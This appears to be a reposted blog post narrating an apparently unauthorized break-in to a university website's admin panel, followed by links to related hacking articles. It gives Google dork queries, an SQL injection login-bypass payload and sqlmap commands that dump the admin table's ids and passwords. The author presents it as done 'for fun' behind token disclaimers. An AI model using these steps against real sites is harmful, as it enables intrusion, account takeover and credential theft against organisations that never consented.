How did I hack a website

存储架构 2017-02-21 阅读原文

This article will record a journey how did i hack a website.

DON’T DO ANYTHING BAD!

1.Gathering more and more informations

Google is a very useful tool,make good use of google hacking may yield twice the result with half the effort. Some significant

grammars are as follow:

site:xxxx.com
 
filetype:txtintext:usernameand password
 
site:baidu.com -site:www.baidu.com -site:video.baidu.com  // - :exclude
 
site:xxx.net  intext:login
 
site:a2.xxxx.cominurl:file
 
site:a2.xxxx.comfiletype:asp
 
site:a2.xxxx.comfiletype:php
 
site:a2.xxxx.comfiletype:aspx
 
site:a3.xxxx.comfiletype:asp
 
site:xxxx.comintitle:管理

I found a target by using :

site:xxx.edu.cninurl:login

it was a admin’s login page. Then we need to find this website’s ip ,usually these two ways:

  • ping
  • whois

Next,use nmap to find more info about this website:

Only 80 port was opened. In general, more ports opened means more potential security vulnerability.For this website ,we can only attack it’s http server.

2.Preliminary test

Enter admin’ in the input box and it returned this page:

It means that the website exists sql injection.

Then use burpsuit to some basic test:

found some interesting test result, the sentence ‘ or 1=1 or ”=’ return different length of response,test this sentence:

Wow~ successful login !we can modify other user’s password:

But..that is not finished

3.Further penetration testing

Save the post request to post.txt through burp’s proxy,and call the sqlmap out:

sqlmap -r post.txt -p id --risk=3 --dbs

Boom…found it’s table name: adminid , continue:

sqlmap –r post.txt –p id --columns –T adminid

finally:

sqlmap -r post.txt -p id --dump -T adminid -C "id,passwd"

Haha.. admin’s id and password were out~

It’s just for fun,please don’t do sth bad~!

责编内容by:IT Dreamer 【阅读原文】。感谢您的支持!

您可能感兴趣的

使用SQLMap进行Access注入 *本文原创作者:simeon,本文属FreeBuf原创奖励计划,未经许可禁止转载 1.1使用sqlmap进行access注入 对于存在access注...
全套安全从业人员必备工具(建议大家收藏这个帖子)... i春秋用户整理来自于网络,摘录于此。 刚入门的汉子,一直以来或许在收集有用的文章,有用的圈子,不但得不到大牛的回应,更多就是碰壁,别人厉害点吧,懒得理...
Important SQLMap Commands The SQLMap tool can be found in every penetration tester’s toolbox. It is one...
Hack the PinkyPalace VM (CTF Challenge) Hello friends! Today we are going to take another boot2root challenge known as ...
Hack The Blackmarket VM (CTF Challenge) BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which i...